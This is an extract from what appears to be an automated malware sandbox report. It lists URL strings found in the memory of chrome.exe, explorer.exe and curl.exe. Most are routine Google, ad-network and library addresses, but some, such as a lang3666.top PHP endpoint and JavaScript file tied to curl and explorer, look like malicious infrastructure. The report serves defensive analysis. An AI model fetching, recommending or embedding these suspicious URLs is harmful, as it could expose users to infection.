                                  Source: chrome.exe, 00000000.00000003.2333546144.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2333473704.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2335007919.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330812480.000028EC05D3B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2335098135.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330696474.000028EC06F84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330848936.000028EC04E84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2335034183.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331000442.000028EC04F8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2333463397.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2336785775.000028EC03D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/madler/zlib/blob/master/zlib.h
                                  Source: chrome.exe, 00000000.00000003.2322628658.000028EC025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329979623.000028EC03DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329320398.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329254218.000028EC06CF7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2323618407.000028EC04B98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/malsup/cycle/issues/44
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/twbs/bootstrap/issues/14093
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/twbs/bootstrap/issues/20280
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2467386602.000028EC02248000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/pagead/form-data
                                  Source: chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2355904920.000028EC07C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2360579493.000028EC07D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377692978.000028EC0693C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343314060.000028EC05188000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/id?slf_rd=1
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/viewthroughconversion
                                  Source: chrome.exe, 00000000.00000003.2320348249.000028EC05C68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://grack.com/blog/2009/11/17/absolutizing-url-in-javascript
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://gunosy.com
                                  Source: chrome.exe, 00000000.00000003.2334224640.000028EC067EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://i.ytimg.com/vi/gobWGqPjLSQ/hqdefault.jpg?sqp
                                  Source: chrome.exe, 00000000.00000003.2334224640.000028EC067EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://i.ytimg.com/vi_webp/gobWGqPjLSQ/default.webp
                                  Source: chrome.exe, 00000000.00000003.2330399294.000028EC053E3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330280472.000028EC06B23000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2334224640.000028EC067EB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329480790.000028EC06A94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://i.ytimg.com/vi_webp/gobWGqPjLSQ/hqdefault.webp
                                  Source: chrome.exe, 00000000.00000003.2334224640.000028EC067EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://i.ytimg.com/vi_webp/gobWGqPjLSQ/mqdefault.webp
                                  Source: chrome.exe, 00000000.00000003.2378086246.000028EC080B2000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2375308476.000028EC06B40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2354362022.000028EC07CF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330516367.000028EC067EB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343314060.000028EC05188000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2386041638.000028EC07B40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://i.ytimg.com/vi_webp/h15NcT6UXh0/maxresdefault.webp
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ingereck.net
                                  Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330696474.000028EC06F84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jnn-pa.googleapis.com
                                  Source: chrome.exe, 00000000.00000002.2484044727.000028EC0367C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485632326.000028EC0380C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2354362022.000028EC07CF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343314060.000028EC05188000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/Create
                                  Source: chrome.exe, 00000000.00000002.2496006842.000028EC048C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2378591472.000028EC06404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495865997.000028EC04894000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377692978.000028EC0693C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2386041638.000028EC07B40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/GenerateIT
                                  Source: chrome.exe, 00000000.00000002.2505295670.000028EC07AAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/GenerateIT(z
                                  Source: chrome.exe, 00000000.00000003.2400418744.000028EC049D9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352813519.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400354743.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2348334197.000028EC067DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400561655.000028EC06D49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494396786.000028EC04574000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488681723.000028EC03D38000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361208200.000028EC02578000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400466181.000028EC07EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://juice-bet.com/
                                  Source: chrome.exe, 00000000.00000003.2400418744.000028EC049D9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352813519.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400354743.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2348334197.000028EC067DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400561655.000028EC06D49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504302862.000028EC078A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361208200.000028EC02578000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400466181.000028EC07EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://juicebet-bookmaker.com/
                                  Source: chrome.exe, 00000000.00000002.2476347082.000028EC02DF0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477429198.000028EC02F50000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494650570.000028EC045A4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://kompaspublishing.nl
                                  Source: chrome.exe, 00000000.00000002.2443190026.000001E4AFD84000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2432437305.0000000006ED5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2432437305.0000000006DE5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.2250792493.0000000006ED5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.2250792493.0000000006EC5000.00000004.00000001.00020000.00000000.sdmp, curl.exe, 0000001E.00000003.1778104266.000001366F8D4000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001E.00000002.1778739442.000001366F8DA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001E.00000002.1778789152.000001366F90B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001E.00000003.1778353998.000001366F8D7000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001E.00000002.1778672642.000001366F8C7000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001E.00000002.1778672642.000001366F8C0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001E.00000003.1777943451.000001366F908000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001E.00000003.1778212265.000001366F90B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lang3666.top/lv/ddas.php
                                  Source: chrome.exe, 00000000.00000002.2489880900.000028EC03EE0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495529652.000028EC04804000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490969003.000028EC04018000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2507173491.000028EC07D3C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://lang3666.top/lv/xfa.js
                                  Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330696474.000028EC06F84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://local;/file/index.m3u8;://;:;index.m3u8;1969-12-31T15:45:03.000-08:15;Nt;r;//;?;1970-01-01T0
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://m.youtube.com
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2483628964.000028EC03604000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2483278146.000028EC035BC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2481401055.000028EC0337C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/chat/
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/chat/:
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/chat/J
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482360375.000028EC03454000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2480220469.000028EC032B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2478797391.000028EC03124000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/chat/download?usp=chrome_default
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2483278146.000028EC035BC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482574043.000028EC03494000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482360375.000028EC03454000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2480220469.000028EC032B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2469526072.000028EC02404000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487008035.000028EC03A6C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://metro.co.uk
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://modernizr.com/)
                                  Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330848936.000028EC04E84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331000442.000028EC04F8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330950163.000028EC044A1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331101993.000028EC05434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2336785775.000028EC03D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com
                                  Source: chrome.exe, 00000000.00000002.2475705022.000028EC02CD0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477429198.000028EC02F50000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2473488281.000028EC02A6C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
                                  Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2475705022.000028EC02CD0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477429198.000028EC02F50000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
                                  Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacyn
                                  Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2475705022.000028EC02CD0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477429198.000028EC02F50000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
                                  Source: chrome.exe, 00000000.00000002.2475705022.000028EC02CD0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477429198.000028EC02F50000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498042478.000028EC052D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
                                  Source: chrome.exe, 00000000.00000003.2301090400.000028EC0497D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385578188.000028EC077B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2301090400.000028EC04978000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302407484.000028EC077B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2468568226.000028EC0231C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://myactivity.google.com/
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://nexxen.tech
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/
                                  Source: chrome.exe, 00000000.00000002.2468779957.000028EC02354000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496387557.000028EC04944000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470328399.000028EC025B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2486226544.000028EC03934000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2479725878.000028EC03244000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488508263.000028EC03CD0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://open-bid.com
                                  Source: chrome.exe, 00000000.00000003.2301920756.000028EC04738000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302499245.000028EC027CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/calendar/
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313568382.000028EC06F9D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pagead2.googlesyndication.com
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pagead2.googlesyndication.com/ccm/collect
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pagead2.googlesyndication.com/pagead/conversion
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313568382.000028EC06F9D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://people.googleapis.com/
                                  Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330696474.000028EC06F84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330848936.000028EC04E84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331000442.000028EC04F8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2336785775.000028EC03D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
                                  Source: chrome.exe, 00000000.00000002.2506905817.000028EC07D00000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488945594.000028EC03E04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501436245.000028EC06920000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2472305495.000028EC028B6000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302567636.000028EC04908000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2505400410.000028EC07AEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501198410.000028EC068C4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500311139.000028EC06614000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2354362022.000028EC07CF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3A7000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2491958834.000028EC040B0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499781921.000028EC06410000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/log?hasfast=true&authuser=0&format=json
                                  Source: chrome.exe, 00000000.00000002.2506905817.000028EC07D00000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/log?hasfast=true&authuser=0&format=json7
                                  Source: chrome.exe, 00000000.00000003.2301090400.000028EC0497D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385578188.000028EC077B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2301090400.000028EC04978000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302407484.000028EC077B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2468568226.000028EC0231C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://postrelease.com
                                  Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331101993.000028EC05434000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://redux.js.org/api/store#subscribelistener
                                  Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331101993.000028EC05434000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://redux.js.org/tutorials/fundamentals/part-4-store#creating-a-store-with-enhancers
                                  Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331101993.000028EC05434000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://redux.js.org/tutorials/fundamentals/part-4-store#middleware
                                  Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331101993.000028EC05434000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://redux.js.org/tutorials/fundamentals/part-6-async-logic#using-the-redux-thunk-middleware
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://samplicio.us
